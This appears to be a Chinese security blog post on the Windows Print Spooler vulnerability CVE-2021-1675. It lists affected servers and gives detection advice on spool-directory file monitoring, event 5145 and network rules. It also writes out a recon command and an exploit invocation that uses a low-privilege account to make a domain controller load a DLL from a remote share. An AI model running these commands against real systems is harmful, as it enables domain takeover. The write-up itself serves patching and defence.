0x00 漏洞影響面
危害:這個漏洞級別屬於稍次於Zerologon的打域利器之一. 和以往的打印機協議中繼/委派系列,危害度和利用條件基本在同一維度,沒全量打補丁且重啟生效的甲方/網管朋友們,得抓緊時間了.
影響版本
Windows Server 2019
Windows Server 2016
Windows Server 2012 R2
Windows Server 2012
Windows Server 2008 R2
Windows Server 2008
0x01 漏洞利用條件
pDriverPath
知道一個驅動的絕對路徑,和系統版本有關講道理: 一個普通域賬號/或者機器賬號權限
0x02 利用成功的環境
一枚普通用戶權限;或者一個機器賬號權限; (可賬號密碼或者hash.)
DC為
Windows Server 2016 Datacenter
//搞事情前,先rpcdump初步偵查下, 養成好習慣
rpcdump.py 172.*.*.*|grep -i print
//然後可以判斷目標主機uptime時間,初步判斷補丁情況
//最後發車
python CVE-2021-1675.py corp/low_user:[email protected] '\\192.168.44.131\share\2.dll'
//目錄成功寫入我們的 2.dll
DC為
Windows Server 2012 Datacenter
使用普通權限的機器賬號
iis$
0x03 檢測和防禦
打印機協議利用:
容易檢測, 策略已經覆蓋
文件變動監控:
特定目錄
C:\Windows\System32\spool\drivers\x64\的*.dll新增;特定目錄子目錄創建
C:\Windows\System32\spool\drivers\x64\, 如old;
事件日誌相關:
打印機協議,事件日誌 5145
可能還有其他日誌,懶得看了.😳
網絡鏈接監控:
前期走的 smb_v3 , 有加密, 流量層可能不太好做.
後期獲取遠端 smb\webdav 上的 dll,元數據採集多的/或者上了nids的,可以寫一條規則。
網絡基線異常.
0x04 參考
Windows Print Spooler 遠程代碼執行漏洞
https://github.com/cube0x0/CVE-2021-1675
0x05 漏洞復現失敗的原因
甲方視角來看,漏洞細節居其次,構建縱深防禦/查漏補缺/舉一反三更為重要。
本公眾號不會太拘泥各種漏洞分析和攻擊利用細節,筆墨會少一些.
如有感興趣的朋友,可回覆公眾號
spoolss, 獲取漏洞復現容易忽略的一個重要細節.